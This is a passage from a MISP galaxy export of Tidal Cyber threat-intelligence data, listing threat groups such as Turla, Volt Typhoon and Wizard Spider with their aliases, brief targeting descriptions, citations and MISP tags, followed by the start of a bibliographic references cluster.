2020](https://app.tidalcyber.com/references/5d9f402f-4ff4-4993-8685-e5656e2f3aff)]</sup><sup>[[Aqua TeamTNT August 2020](https://app.tidalcyber.com/references/ca10ad0d-1a47-4006-8f76-c2246aee7752)]</sup><sup>[[Intezer TeamTNT Explosion September 2021](https://app.tidalcyber.com/references/e0d6208b-a4d6-45f0-bb3a-6c8681630b55)]</sup>

The tag is: misp-galaxy:groups="TeamTNT"

XENOTIME - Associated Group

The activity group XENOTIME, as defined by Dragos, has overlaps with activity reported upon by FireEye about TEMP.Veles as well as the actors behind [TRITON]([Dragos Xenotime 2018(https://app.tidalcyber.com/references/b20fe65f-df43-4a59-af3f-43afafba15ab)]</sup><sup>[[Pylos Xenotime 2019](https://app.tidalcyber.com/references/e2f246d8-c75e-4e0f-bba8-869d82be26da)]</sup><sup>[[FireEye TRITON 2019](https://app.tidalcyber.com/references/49c97b85-ca22-400a-9dc4-6290cc117f04)]</sup><sup>[[FireEye TEMP.Veles 2018](https://app.tidalcyber.com/references/e41151fa-ea11-43ca-9689-c65aae63a8d2)]</sup>

The tag is: misp-galaxy:groups="XENOTIME - Associated Group"

TEMP.Veles

[TEMP.Veles](https://app.tidalcyber.com/groups/3a54b8dc-a231-4db8-96da-1c0c1aa396f6) is a Russia-based threat group that has targeted critical infrastructure. The group has been observed utilizing [TRITON](https://app.tidalcyber.com/software/), a malware framework designed to manipulate industrial safety systems.<sup>[[FireEye TRITON 2019](https://app.tidalcyber.com/references/49c97b85-ca22-400a-9dc4-6290cc117f04)]</sup><sup>[[FireEye TEMP.Veles 2018](https://app.tidalcyber.com/references/e41151fa-ea11-43ca-9689-c65aae63a8d2)]</sup><sup>[[FireEye TEMP.Veles JSON April 2019](https://app.tidalcyber.com/references/491783dc-7a6b-42a6-b923-c4439117e7e4)]</sup>

The tag is: misp-galaxy:groups="TEMP.Veles"

The White Company

[The White Company](https://app.tidalcyber.com/groups/830079fe-9824-405b-93e0-c28592155c49) is a likely state-sponsored threat actor with advanced capabilities. From 2017 through 2018, the group led an espionage campaign called Operation Shaheen targeting government and military organizations in Pakistan.<sup>[[Cylance Shaheen Nov 2018](https://app.tidalcyber.com/references/57802e46-e12c-4230-8d1c-08854a0de06a)]</sup>

The tag is: misp-galaxy:groups="The White Company"

TG-1314 - Associated Group

The tag is: misp-galaxy:groups="TG-1314 - Associated Group"

Threat Group-1314

[Threat Group-1314](https://app.tidalcyber.com/groups/0f86e871-0c6c-4227-ae28-3f3696d6ae9d) is an unattributed threat group that has used compromised credentials to log into a victim’s remote access infrastructure. <sup>[[Dell TG-1314](https://app.tidalcyber.com/references/79fc7568-b6ff-460b-9200-56d7909ed157)]</sup>

The tag is: misp-galaxy:groups="Threat Group-1314"

Earth Smilodon - Associated Group

<sup>[[Trend Micro Iron Tiger April 2021](https://app.tidalcyber.com/references/d0890d4f-e7ca-4280-a54e-d147f6dd72aa)]</sup>

The tag is: misp-galaxy:groups="Earth Smilodon - Associated Group"

TG-3390 - Associated Group

The tag is: misp-galaxy:groups="TG-3390 - Associated Group"

BRONZE UNION - Associated Group

<sup>[[SecureWorks BRONZE UNION June 2017](https://app.tidalcyber.com/references/42adda47-f5d6-4d34-9b3d-3748a782f886)]</sup><sup>[[Nccgroup Emissary Panda May 2018](https://app.tidalcyber.com/references/e279c308-fabc-47d3-bdeb-296266c80988)]</sup>

The tag is: misp-galaxy:groups="BRONZE UNION - Associated Group"

Iron Tiger - Associated Group

<sup>[[Hacker News LuckyMouse June 2018](https://app.tidalcyber.com/references/de78446a-cb46-4422-820b-9ddf07557b1a)]</sup><sup>[[Trend Micro Iron Tiger April 2021](https://app.tidalcyber.com/references/d0890d4f-e7ca-4280-a54e-d147f6dd72aa)]</sup>

The tag is: misp-galaxy:groups="Iron Tiger - Associated Group"

LuckyMouse - Associated Group

<sup>[[Securelist LuckyMouse June 2018](https://app.tidalcyber.com/references/f974708b-598c-46a9-aac9-c5fbdd116c2a)]</sup><sup>[[Hacker News LuckyMouse June 2018](https://app.tidalcyber.com/references/de78446a-cb46-4422-820b-9ddf07557b1a)]</sup><sup>[[Trend Micro Iron Tiger April 2021](https://app.tidalcyber.com/references/d0890d4f-e7ca-4280-a54e-d147f6dd72aa)]</sup>

The tag is: misp-galaxy:groups="LuckyMouse - Associated Group"

Emissary Panda - Associated Group

The tag is: misp-galaxy:groups="Emissary Panda - Associated Group"

APT27 - Associated Group

<sup>[[Nccgroup Emissary Panda May 2018](https://app.tidalcyber.com/references/e279c308-fabc-47d3-bdeb-296266c80988)]</sup><sup>[[Securelist LuckyMouse June 2018](https://app.tidalcyber.com/references/f974708b-598c-46a9-aac9-c5fbdd116c2a)]</sup><sup>[[Hacker News LuckyMouse June 2018](https://app.tidalcyber.com/references/de78446a-cb46-4422-820b-9ddf07557b1a)]</sup><sup>[[Trend Micro Iron Tiger April 2021](https://app.tidalcyber.com/references/d0890d4f-e7ca-4280-a54e-d147f6dd72aa)]</sup>

The tag is: misp-galaxy:groups="APT27 - Associated Group"

Threat Group-3390

[Threat Group-3390](https://app.tidalcyber.com/groups/79be2f31-5626-425e-844c-fd9c99e38fe5) is a Chinese threat group that has extensively used strategic Web compromises to target victims.<sup>[[Dell TG-3390](https://app.tidalcyber.com/references/dfd2d832-a6c5-40e7-a554-5a92f05bebae)]</sup> The group has been active since at least 2010 and has targeted organizations in the aerospace, government, defense, technology, energy, manufacturing and gambling/betting sectors.<sup>[[SecureWorks BRONZE UNION June 2017](https://app.tidalcyber.com/references/42adda47-f5d6-4d34-9b3d-3748a782f886)]</sup><sup>[[Securelist LuckyMouse June 2018](https://app.tidalcyber.com/references/f974708b-598c-46a9-aac9-c5fbdd116c2a)]</sup><sup>[[Trend Micro DRBControl February 2020](https://app.tidalcyber.com/references/4dfbf26d-023b-41dd-82c8-12fe18cb10e6)]</sup>

The tag is: misp-galaxy:groups="Threat Group-3390"

Thrip

[Thrip](https://app.tidalcyber.com/groups/a3b39b07-0bfa-4c69-9f01-acf7dc6033b4) is an espionage group that has targeted satellite communications, telecoms, and defense contractor companies in the U.S. and Southeast Asia. The group uses custom malware as well as "living off the land" techniques. <sup>[[Symantec Thrip June 2018](https://app.tidalcyber.com/references/482a6946-b663-4789-a31f-83fb2132118d)]</sup>

The tag is: misp-galaxy:groups="Thrip"

BRONZE HUNTLEY - Associated Group

The tag is: misp-galaxy:groups="BRONZE HUNTLEY - Associated Group"

Karma Panda - Associated Group

<sup>[[Kaspersky CactusPete Aug 2020](https://app.tidalcyber.com/references/1c393964-e717-45ad-8eb6-5df5555d3c70)]</sup><sup>[[CrowdStrike Manufacturing Threat July 2020](https://app.tidalcyber.com/references/5ed6a702-dcc5-4021-95cc-5b720dbd8774)]</sup>

The tag is: misp-galaxy:groups="Karma Panda - Associated Group"

Earth Akhlut - Associated Group

<sup>[[TrendMicro Tonto Team October 2020](https://app.tidalcyber.com/references/140e6b01-6b98-4f82-9455-0c84b3856b86)]</sup>

The tag is: misp-galaxy:groups="Earth Akhlut - Associated Group"

CactusPete - Associated Group

The tag is: misp-galaxy:groups="CactusPete - Associated Group"

Tonto Team

[Tonto Team](https://app.tidalcyber.com/groups/9f5c5672-5e7e-4440-afc8-3fdf46a1bb6c) is a suspected Chinese state-sponsored cyber espionage threat group that has primarily targeted South Korea, Japan, Taiwan, and the United States since at least 2009; by 2020 they expanded operations to include other Asian as well as Eastern European countries. [Tonto Team](https://app.tidalcyber.com/groups/9f5c5672-5e7e-4440-afc8-3fdf46a1bb6c) has targeted government, military, energy, mining, financial, education, healthcare, and technology organizations, including through the Heartbeat Campaign (2009-2012) and Operation Bitter Biscuit (2017).<sup>[[Kaspersky CactusPete Aug 2020](https://app.tidalcyber.com/references/1c393964-e717-45ad-8eb6-5df5555d3c70)]</sup><sup>[[ESET Exchange Mar 2021](https://app.tidalcyber.com/references/c83f1810-22bb-4def-ab2f-3f3d67703f47)]</sup><sup>[[FireEye Chinese Espionage October 2019](https://app.tidalcyber.com/references/d37c069c-7fb8-44e1-8377-da97e8bbcf67)]</sup><sup>[[ARS Technica China Hack SK April 2017](https://app.tidalcyber.com/references/c9c647b6-f4fb-44d6-9376-23c1ae9520b4)]</sup><sup>[[Trend Micro HeartBeat Campaign January 2013](https://app.tidalcyber.com/references/f42a36c2-1ca5-49ff-a7ec-7de90379a6d5)]</sup><sup>[[Talos Bisonal 10 Years March 2020](https://app.tidalcyber.com/references/6844e59b-d393-43df-9978-e3e3cc7b8db6)]</sup>

The tag is: misp-galaxy:groups="Tonto Team"

Mythic Leopard - Associated Group

<sup>[[Crowdstrike Mythic Leopard Profile](https://app.tidalcyber.com/references/efa5dc67-3364-4049-bb13-8b9e1b55f172)]</sup><sup>[[Kaspersky Transparent Tribe August 2020](https://app.tidalcyber.com/references/42c7faa2-f664-4e4a-9d23-93c88a09da5b)]</sup><sup>[[Talos Transparent Tribe May 2021](https://app.tidalcyber.com/references/5d58c285-bc7d-4a8a-a96a-ac7118c1089d)]</sup>

The tag is: misp-galaxy:groups="Mythic Leopard - Associated Group"

COPPER FIELDSTONE - Associated Group

<sup>[[Secureworks COPPER FIELDSTONE Profile](https://app.tidalcyber.com/references/d7f5f154-3638-47c1-8e1e-a30a6504a735)]</sup>

The tag is: misp-galaxy:groups="COPPER FIELDSTONE - Associated Group"

APT36 - Associated Group

<sup>[[Talos Transparent Tribe May 2021](https://app.tidalcyber.com/references/5d58c285-bc7d-4a8a-a96a-ac7118c1089d)]</sup>

The tag is: misp-galaxy:groups="APT36 - Associated Group"

ProjectM - Associated Group

<sup>[[Unit 42 ProjectM March 2016](https://app.tidalcyber.com/references/adee82e6-a74a-4a91-ab5a-97847b135ca3)]</sup><sup>[[Kaspersky Transparent Tribe August 2020](https://app.tidalcyber.com/references/42c7faa2-f664-4e4a-9d23-93c88a09da5b)]</sup>

The tag is: misp-galaxy:groups="ProjectM - Associated Group"

Transparent Tribe

[Transparent Tribe](https://app.tidalcyber.com/groups/441b91d1-256a-4763-bac6-8f1c76764a25) is a suspected Pakistan-based threat group that has been active since at least 2013, primarily targeting diplomatic, defense, and research organizations in India and Afghanistan.<sup>[[Proofpoint Operation Transparent Tribe March 2016](https://app.tidalcyber.com/references/8e39d0da-114f-4ae6-8130-ca1380077d6a)]</sup><sup>[[Kaspersky Transparent Tribe August 2020](https://app.tidalcyber.com/references/42c7faa2-f664-4e4a-9d23-93c88a09da5b)]</sup><sup>[[Talos Transparent Tribe May 2021](https://app.tidalcyber.com/references/5d58c285-bc7d-4a8a-a96a-ac7118c1089d)]</sup>

The tag is: misp-galaxy:groups="Transparent Tribe"

KeyBoy - Associated Group

<sup>[[Unit 42 Tropic Trooper Nov 2016](https://app.tidalcyber.com/references/cad84e3d-9506-44f8-bdd9-d090e6ce9b06)]</sup><sup>[[TrendMicro Tropic Trooper Mar 2018](https://app.tidalcyber.com/references/5d69d122-13bc-45c4-95ab-68283a21b699)]</sup>

The tag is: misp-galaxy:groups="KeyBoy - Associated Group"

Pirate Panda - Associated Group

<sup>[[Crowdstrike Pirate Panda April 2020](https://app.tidalcyber.com/references/f71410b4-5f79-439a-ae9e-8965f9bc577f)]</sup>

The tag is: misp-galaxy:groups="Pirate Panda - Associated Group"

Tropic Trooper

[Tropic Trooper](https://app.tidalcyber.com/groups/0a245c5e-c1a8-480f-8655-bb2594e3266b) is an unaffiliated threat group that has led targeted campaigns against targets in Taiwan, the Philippines, and Hong Kong. [Tropic Trooper](https://app.tidalcyber.com/groups/0a245c5e-c1a8-480f-8655-bb2594e3266b) focuses on targeting government, healthcare, transportation, and high-tech industries and has been active since 2011.<sup>[[TrendMicro Tropic Trooper Mar 2018](https://app.tidalcyber.com/references/5d69d122-13bc-45c4-95ab-68283a21b699)]</sup><sup>[[Unit 42 Tropic Trooper Nov 2016](https://app.tidalcyber.com/references/cad84e3d-9506-44f8-bdd9-d090e6ce9b06)]</sup><sup>[[TrendMicro Tropic Trooper May 2020](https://app.tidalcyber.com/references/4fbc1df0-f174-4461-817d-0baf6e947ba1)]</sup>

The tag is: misp-galaxy:groups="Tropic Trooper"

Waterbug - Associated Group

Based similarity in TTPs and malware used, Turla and Waterbug appear to be the same group.<sup>[[Symantec Waterbug](https://app.tidalcyber.com/references/ec02f951-17b8-44cb-945a-e5c313555124)]</sup>

The tag is: misp-galaxy:groups="Waterbug - Associated Group"

WhiteBear - Associated Group

WhiteBear is a designation used by Securelist to describe a cluster of activity that has overlaps with activity described by others as Turla, but appears to have a separate focus.<sup>[[Securelist WhiteBear Aug 2017](https://app.tidalcyber.com/references/44626060-3d9b-480e-b4ea-7dac27878e5e)]</sup><sup>[[Talos TinyTurla September 2021](https://app.tidalcyber.com/references/94cdbd73-a31a-4ec3-aa36-de3ea077c1c7)]</sup>

The tag is: misp-galaxy:groups="WhiteBear - Associated Group"

IRON HUNTER - Associated Group

<sup>[[Secureworks IRON HUNTER Profile](https://app.tidalcyber.com/references/af5cb7da-61e0-49dc-8132-c019ce5ea6d3)]</sup>

The tag is: misp-galaxy:groups="IRON HUNTER - Associated Group"

Group 88 - Associated Group

<sup>[[Leonardo Turla Penquin May 2020](https://app.tidalcyber.com/references/09d8bb54-6fa5-4842-98aa-6e9656a19092)]</sup>

The tag is: misp-galaxy:groups="Group 88 - Associated Group"

Belugasturgeon - Associated Group

<sup>[[Accenture HyperStack October 2020](https://app.tidalcyber.com/references/680f2a0b-f69d-48bd-93ed-20ee2f79e3f7)]</sup>

The tag is: misp-galaxy:groups="Belugasturgeon - Associated Group"

Snake - Associated Group

The tag is: misp-galaxy:groups="Snake - Associated Group"

Krypton - Associated Group

The tag is: misp-galaxy:groups="Krypton - Associated Group"

Venomous Bear - Associated Group

The tag is: misp-galaxy:groups="Venomous Bear - Associated Group"

Turla

[Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2) is a cyber espionage threat group that has been attributed to Russia’s Federal Security Service (FSB). They have compromised victims in over 50 countries since at least 2004, spanning a range of industries including government, embassies, military, education, research and pharmaceutical companies. [Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2) is known for conducting watering hole and spearphishing campaigns, and leveraging in-house tools and malware, such as [Uroburos]([Kaspersky Turla(https://app.tidalcyber.com/references/535e9f1a-f89e-4766-a290-c5b8100968f8)]</sup><sup>[[ESET Gazer Aug 2017](https://app.tidalcyber.com/references/9d1c40af-d4bc-4d4a-b667-a17378942685)]</sup><sup>[[CrowdStrike VENOMOUS BEAR](https://app.tidalcyber.com/references/ee400057-2b26-4464-96b4-484c9eb9d5c2)]</sup><sup>[[ESET Turla Mosquito Jan 2018](https://app.tidalcyber.com/references/cd177c2e-ef22-47be-9926-61e25fd5f33b)]</sup><sup>[[Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023](https://app.tidalcyber.com/references/1931b80a-effb-59ec-acae-c0f17efb8cad)]</sup>

The tag is: misp-galaxy:groups="Turla"

Vice Society

Vice Society is an extortion-focused threat actor group first observed in mid-2021. The group gained notoriety after targeting a considerable number of educational institutions, especially lower education institutions. Although the education sector accounts for a disproportionate amount of the group’s victims, Vice Society has claimed victims in multiple other industries too, including the healthcare, retail, financial, insurance, and public services sectors. The group regularly pressures victims into paying a ransom by threatening to leak data exfiltrated during its intrusions. Vice Society is not known to have developed its own ransomware, instead deploying other existing families, including HELLOKITTY/FIVEHANDS and Zeppelin.<sup>[[U.S. CISA Vice Society September 2022](/references/0a754513-5f20-44a0-8cea-c5d9519106c8)]</sup>

Related Vulnerabilities: CVE-2021-1675<sup>[[Unit 42 Vice Society December 6 2022](/references/6abf7387-0857-4938-b36e-1374a66d4ed8)]</sup>, CVE-2021-34527<sup>[[Unit 42 Vice Society December 6 2022](/references/6abf7387-0857-4938-b36e-1374a66d4ed8)]</sup>

The tag is: misp-galaxy:groups="Vice Society"

Lebanese Cedar - Associated Group

<sup>[[ClearSky Lebanese Cedar Jan 2021](https://app.tidalcyber.com/references/53944d48-caa9-4912-b42d-94a3789ed15b)]</sup>

The tag is: misp-galaxy:groups="Lebanese Cedar - Associated Group"

Volatile Cedar

[Volatile Cedar](https://app.tidalcyber.com/groups/7c3ef21c-0e1c-43d5-afb0-3a07c5a66937) is a Lebanese threat group that has targeted individuals, companies, and institutions worldwide. [Volatile Cedar](https://app.tidalcyber.com/groups/7c3ef21c-0e1c-43d5-afb0-3a07c5a66937) has been operating since 2012 and is motivated by political and ideological interests.<sup>[[CheckPoint Volatile Cedar March 2015](https://app.tidalcyber.com/references/a26344a2-63ca-422e-8cf9-0cf22a5bee72)]</sup><sup>[[ClearSky Lebanese Cedar Jan 2021](https://app.tidalcyber.com/references/53944d48-caa9-4912-b42d-94a3789ed15b)]</sup>

The tag is: misp-galaxy:groups="Volatile Cedar"

Volt Typhoon - Tidal

Volt Typhoon is a China state-backed threat actor that has targeted critical infrastructure organizations in a range of specific sectors in Guam and elsewhere in the United States since mid-2021. Its activities primarily focus on espionage and information gathering. Researchers indicate the group is focused on maintaining stealth and persistence in victim networks for as long as possible, leveraging a large number of living-off-the-land techniques to accomplish these goals. Researchers assessed with moderate confidence that Volt Typhoon’s activities are focused on developing capabilities that could disrupt communications infrastructure between the United States and entities in Asia in the event of a potential geopolitical crisis.<sup>[[U.S. CISA Volt Typhoon May 24 2023](/references/12320f38-ebbf-486a-a450-8a548c3722d6)]</sup>

Related Vulnerabilities: CVE-2021-40539, CVE-2021-27860<sup>[[U.S. CISA Volt Typhoon May 24 2023](/references/12320f38-ebbf-486a-a450-8a548c3722d6)]</sup>

The tag is: misp-galaxy:groups="Volt Typhoon - Tidal"

BRONZE SILHOUETTE - Associated Group

<sup>[[Secureworks BRONZE SILHOUETTE May 2023](https://app.tidalcyber.com/references/77624549-e170-5894-9219-a15b4aa31726)]</sup>

The tag is: misp-galaxy:groups="BRONZE SILHOUETTE - Associated Group"

Vanguard Panda - Associated Group

<sup>[[U.S. CISA Volt Typhoon February 7 2024](/references/c74f5ecf-8810-4670-b778-24171c078724)]</sup>

The tag is: misp-galaxy:groups="Vanguard Panda - Associated Group"

Dev-0391 - Associated Group

<sup>[[U.S. CISA Volt Typhoon February 7 2024](/references/c74f5ecf-8810-4670-b778-24171c078724)]</sup>

The tag is: misp-galaxy:groups="Dev-0391 - Associated Group"

UNC3236 - Associated Group

<sup>[[U.S. CISA Volt Typhoon February 7 2024](/references/c74f5ecf-8810-4670-b778-24171c078724)]</sup>

The tag is: misp-galaxy:groups="UNC3236 - Associated Group"

Voltzite - Associated Group

<sup>[[U.S. CISA Volt Typhoon February 7 2024](/references/c74f5ecf-8810-4670-b778-24171c078724)]</sup>

The tag is: misp-galaxy:groups="Voltzite - Associated Group"

Insidious Taurus - Associated Group

<sup>[[U.S. CISA Volt Typhoon February 7 2024](/references/c74f5ecf-8810-4670-b778-24171c078724)]</sup>

The tag is: misp-galaxy:groups="Insidious Taurus - Associated Group"

Volt Typhoon

[Volt Typhoon](https://app.tidalcyber.com/groups/4ea1245f-3f35-5168-bd10-1fc49142fd4e) is a People’s Republic of China (PRC) state-sponsored actor that has been active since at least 2021. [Volt Typhoon](https://app.tidalcyber.com/groups/4ea1245f-3f35-5168-bd10-1fc49142fd4e) typically focuses on espionage and information gathering and has targeted critical infrastructure organizations in the US including Guam. [Volt Typhoon](https://app.tidalcyber.com/groups/4ea1245f-3f35-5168-bd10-1fc49142fd4e) has emphasized stealth in operations using web shells, living-off-the-land (LOTL) binaries, hands on keyboard activities, and stolen credentials.<sup>[[Microsoft Volt Typhoon May 2023](https://app.tidalcyber.com/references/8b74f0b7-9719-598c-b3ee-61d734393e6f)]</sup><sup>[[Joint Cybersecurity Advisory Volt Typhoon June 2023](https://app.tidalcyber.com/references/14872f08-e219-5c0d-a2d7-43a3ba348b4b)]</sup><sup>[[Secureworks BRONZE SILHOUETTE May 2023](https://app.tidalcyber.com/references/77624549-e170-5894-9219-a15b4aa31726)]</sup>

The tag is: misp-galaxy:groups="Volt Typhoon"

Whitefly

[Whitefly](https://app.tidalcyber.com/groups/f0943620-7bbb-4239-8ed3-c541c36baaa1) is a cyber espionage group that has been operating since at least 2017. The group has targeted organizations based mostly in Singapore across a wide variety of sectors, and is primarily interested in stealing large amounts of sensitive information. The group has been linked to an attack against Singapore’s largest public health organization, SingHealth.<sup>[[Symantec Whitefly March 2019](https://app.tidalcyber.com/references/d0e48356-36d9-4b4c-b621-e3c4404378d2)]</sup>

The tag is: misp-galaxy:groups="Whitefly"

Windigo

The [Windigo](https://app.tidalcyber.com/groups/eeb69751-8c22-4a5f-8da2-239cc7d7746c) group has been operating since at least 2011, compromising thousands of Linux and Unix servers using the [Ebury](https://app.tidalcyber.com/software/2375465a-e6a9-40ab-b631-a5b04cf5c689) SSH backdoor to create a spam botnet. Despite law enforcement intervention against the creators, [Windigo](https://app.tidalcyber.com/groups/eeb69751-8c22-4a5f-8da2-239cc7d7746c) operators continued updating [Ebury](https://app.tidalcyber.com/software/2375465a-e6a9-40ab-b631-a5b04cf5c689) through 2019.<sup>[[ESET Windigo Mar 2014](https://app.tidalcyber.com/references/721cdb36-d3fc-4212-b324-6be2b5f9cb46)]</sup><sup>[[CERN Windigo June 2019](https://app.tidalcyber.com/references/e9f1289f-a32e-441c-8787-cb32a26216d1)]</sup>

The tag is: misp-galaxy:groups="Windigo"

Bahamut - Associated Group

The tag is: misp-galaxy:groups="Bahamut - Associated Group"

Windshift

[Windshift](https://app.tidalcyber.com/groups/4e880d01-313a-4926-8470-78c48824aa82) is a threat group that has been active since at least 2017, targeting specific individuals for surveillance in government departments and critical infrastructure across the Middle East.<sup>[[SANS Windshift August 2018](https://app.tidalcyber.com/references/97eac0f2-d528-4f7c-8425-7531eae4fc39)]</sup><sup>[[objective-see windtail1 dec 2018](https://app.tidalcyber.com/references/7a32c962-8050-45de-8b90-8644be5109d9)]</sup><sup>[[objective-see windtail2 jan 2019](https://app.tidalcyber.com/references/e6bdc679-ee0c-4f34-b5bc-0d6a26485b36)]</sup>

The tag is: misp-galaxy:groups="Windshift"

Blackfly - Associated Group

The tag is: misp-galaxy:groups="Blackfly - Associated Group"

Winnti Group

[Winnti Group](https://app.tidalcyber.com/groups/6932662a-53a7-4e43-877f-6e940e2d744b) is a threat group with Chinese origins that has been active since at least 2010. The group has heavily targeted the gaming industry, but it has also expanded the scope of its targeting.<sup>[[Kaspersky Winnti April 2013](https://app.tidalcyber.com/references/2d4834b9-61c4-478e-919a-317d97cd2c36)]</sup><sup>[[Kaspersky Winnti June 2015](https://app.tidalcyber.com/references/86504950-0f4f-42bc-b003-24f60ae97c99)]</sup><sup>[[Novetta Winnti April 2015](https://app.tidalcyber.com/references/cbe8373b-f14b-4890-99fd-35ffd7090dea)]</sup> Some reporting suggests a number of other groups, including [Axiom](https://app.tidalcyber.com/groups/90f4d3f9-3fe3-4a64-8dc1-172c6d037dca), [APT17](https://app.tidalcyber.com/groups/5f083251-f5dc-459a-abfc-47a1aa7f5094), and [Ke3chang](https://app.tidalcyber.com/groups/26c0925f-1a3c-4df6-b27a-62b9731299b8), are closely linked to [Winnti Group]([401 TRG Winnti Umbrella May 2018(https://app.tidalcyber.com/references/e3f1f2e4-dc1c-4d9c-925d-47013f44a69f)]</sup>

The tag is: misp-galaxy:groups="Winnti Group"

WIRTE

[WIRTE](https://app.tidalcyber.com/groups/73da066d-b25f-45ba-862b-1a69228c6baa) is a threat group that has been active since at least August 2018. [WIRTE](https://app.tidalcyber.com/groups/73da066d-b25f-45ba-862b-1a69228c6baa) has targeted government, diplomatic, financial, military, legal, and technology organizations in the Middle East and Europe.<sup>[[Lab52 WIRTE Apr 2019](https://app.tidalcyber.com/references/884b675e-390c-4f6d-8cb7-5d97d84115e5)]</sup><sup>[[Kaspersky WIRTE November 2021](https://app.tidalcyber.com/references/143b4694-024d-49a5-be3c-d9ceca7295b2)]</sup>

The tag is: misp-galaxy:groups="WIRTE"

TEMP.MixMaster - Associated Group

<sup>[[FireEye Ryuk and Trickbot January 2019](https://app.tidalcyber.com/references/b29dc755-f1f0-4206-9ecf-29257a1909ee)]</sup>

The tag is: misp-galaxy:groups="TEMP.MixMaster - Associated Group"

Grim Spider - Associated Group

The tag is: misp-galaxy:groups="Grim Spider - Associated Group"

UNC1878 - Associated Group

<sup>[[FireEye KEGTAP SINGLEMALT October 2020](https://app.tidalcyber.com/references/59162ffd-cb95-4757-bb1e-0c2a4ad5c083)]</sup>

The tag is: misp-galaxy:groups="UNC1878 - Associated Group"

FIN12 - Associated Group

The tag is: misp-galaxy:groups="FIN12 - Associated Group"

GOLD BLACKBURN - Associated Group

<sup>[[Secureworks Gold Blackburn Mar 2022](https://app.tidalcyber.com/references/b6b27fa9-488c-5b6d-8e12-fe8371846cd3)]</sup>

The tag is: misp-galaxy:groups="GOLD BLACKBURN - Associated Group"

ITG23 - Associated Group

The tag is: misp-galaxy:groups="ITG23 - Associated Group"

Periwinkle Tempest - Associated Group

<sup>[[Secureworks Gold Blackburn Mar 2022](https://app.tidalcyber.com/references/b6b27fa9-488c-5b6d-8e12-fe8371846cd3)]</sup>

The tag is: misp-galaxy:groups="Periwinkle Tempest - Associated Group"

Wizard Spider

[Wizard Spider](https://app.tidalcyber.com/groups/0b431229-036f-4157-a1da-ff16dfc095f8) is a Russia-based financially motivated threat group originally known for the creation and deployment of [TrickBot](https://app.tidalcyber.com/software/c2bd4213-fc7b-474f-b5a0-28145b07c51d) since at least 2016. [Wizard Spider](https://app.tidalcyber.com/groups/0b431229-036f-4157-a1da-ff16dfc095f8) possesses a diverse aresenal of tools and has conducted ransomware campaigns against a variety of organizations, ranging from major corporations to hospitals.<sup>[[CrowdStrike Ryuk January 2019](https://app.tidalcyber.com/references/df471757-2ce0-48a7-922f-a84c57704914)]</sup><sup>[[DHS/CISA Ransomware Targeting Healthcare October 2020](https://app.tidalcyber.com/references/984e86e6-32e4-493c-8172-3d29de4720cc)]</sup><sup>[[CrowdStrike Wizard Spider October 2020](https://app.tidalcyber.com/references/5c8d67ea-63bc-4765-b6f6-49fa5210abe6)]</sup>

The tag is: misp-galaxy:groups="Wizard Spider"

APT31 - Associated Group

<sup>[[Check Point APT31 February 2021](https://app.tidalcyber.com/references/84ac99ef-106f-44e9-97f0-3eda90570932)]</sup>

The tag is: misp-galaxy:groups="APT31 - Associated Group"

ZIRCONIUM

[ZIRCONIUM](https://app.tidalcyber.com/groups/5e34409e-2f55-4384-b519-80747d02394c) is a threat group operating out of China, active since at least 2017, that has targeted individuals associated with the 2020 US presidential election and prominent leaders in the international affairs community.<sup>[[Microsoft Targeting Elections September 2020](https://app.tidalcyber.com/references/1d7070fd-01be-4776-bb21-13368a6173b1)]</sup><sup>[[Check Point APT31 February 2021](https://app.tidalcyber.com/references/84ac99ef-106f-44e9-97f0-3eda90570932)]</sup>

The tag is: misp-galaxy:groups="ZIRCONIUM"

Tidal References

Tidal References Cluster.

Tidal References is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Tidal Cyber

D3Secutrity CTI Feeds

Banerd, W. (2019, April 30). 10 of the Best Open Source Threat Intelligence Feeds. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="D3Secutrity CTI Feeds"

Table 12397. Table References

Links

https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/

Linux Logs

Marcel. (2018, April 19). 12 Critical Linux Log Files You Must be Monitoring. Retrieved March 29, 2020.

The tag is: misp-galaxy:references="Linux Logs"

Table 12398. Table References

Links

https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/

Netspi PowerShell Execution Policy Bypass

Sutherland, S. (2014, September 9). 15 Ways to Bypass the PowerShell Execution Policy. Retrieved July 23, 2015.

The tag is: misp-galaxy:references="Netspi PowerShell Execution Policy Bypass"

Table 12399. Table References

Links

https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/

Mandiant-leaks

DANIEL KAPELLMANN ZAFRA, COREY HIDELBRANDT, NATHAN BRUBAKER, KEITH LUNDEN. (2022, January 31). 1 in 7 OT Ransomware Extortion Attacks Leak Critical Operational Technology Information. Retrieved August 18, 2023.

The tag is: misp-galaxy:references="Mandiant-leaks"

Table 12400. Table References

Links

https://www.mandiant.com/resources/blog/ransomware-extortion-ot-docs

Tilbury Windows Credentials

Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack, Mitigation, Defense. Retrieved February 21, 2020.

The tag is: misp-galaxy:references="Tilbury Windows Credentials"

Table 12401. Table References

Links

https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf

CWE top 25

Christey, S., Brown, M., Kirby, D., Martin, B., Paller, A.. (2011, September 13). 2011 CWE/SANS Top 25 Most Dangerous Software Errors. Retrieved April 10, 2019.

The tag is: misp-galaxy:references="CWE top 25"

Table 12402. Table References

Links

https://cwe.mitre.org/top25/index.html

CrowdStrike 2015 Global Threat Report

CrowdStrike Intelligence. (2016). 2015 Global Threat Report. Retrieved April 11, 2018.

The tag is: misp-galaxy:references="CrowdStrike 2015 Global Threat Report"

Table 12403. Table References

Links

https://go.crowdstrike.com/rs/281-OBQ-266/images/15GlobalThreatReport.pdf

Prolific OSX Malware History

Bit9 + Carbon Black Threat Research Team. (2015). 2015: The Most Prolific Year in History for OS X Malware. Retrieved July 8, 2017.

The tag is: misp-galaxy:references="Prolific OSX Malware History"

Table 12404. Table References

Links

https://assets.documentcloud.org/documents/2459197/bit9-carbon-black-threat-research-report-2015.pdf

CERN Windigo June 2019

CERN. (2019, June 4). 2019/06/04 Advisory: Windigo attacks. Retrieved February 10, 2021.

The tag is: misp-galaxy:references="CERN Windigo June 2019"

Table 12405. Table References

Links

